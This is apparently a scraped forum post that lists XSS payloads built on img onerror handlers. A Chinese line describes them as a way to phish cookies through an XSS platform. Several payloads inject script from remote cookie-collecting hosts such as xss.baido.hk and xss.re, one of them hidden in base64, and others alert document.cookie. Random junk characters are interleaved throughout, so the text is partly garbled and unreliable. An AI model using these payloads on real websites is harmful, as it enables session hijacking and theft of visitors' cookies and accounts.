<img src='non-exist.jpg'onerror="alert('xss')">" z% B- \# x/ `* }/ h6 ?" e
<img src=# onerror=alert(123)>
" m; R, s8 n* q6 {: Y<img src=# onerror=alert(document.cookie)>
8 P* t+ Y- }+ z0 f下面是利用平台钓cookie的7 y8 G. _5 G5 p0 u7 K
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>! J. I' y/ _! h q5 a
6 H1 Q8 L% V2 ]! a2 |) P0 t
& X4 |- \) b4 y) a6 V3 f
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
2 L& H9 y' j3 x9 d3 g/ Y<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>9 R- X0 x, M+ \/ j0 C8 [
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>; O7 L* C* n0 f1 l4 ?4 F- k5 K- j
<img src=1 onerror=jQuery.getScript("//xss.re/974")> . Z# ? X9 S2 K/ ]. X( V+ v# g8 D
<img src="#"># X$ |% p6 l' q F; \9 y d
<img src="#">
; g. I. x: Q$ T) N! w<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>3 F2 P5 m6 X. M
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">6 X$ @! ~# k8 h& o0 g/ M
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
! X' O3 P$ o, |5 u5 i<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>' l0 _5 z( s! s9 ^8 g
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>/ m0 I6 g! e% ]7 _- G9 o2 h
<img src=x width="0" height="0"></img>
3 B$ _6 s: d" t" m: b+ {<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
; e, @- Z" j3 @$ d; ?2 ~<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>. T! f( L) |+ f6 _- k0 ~
|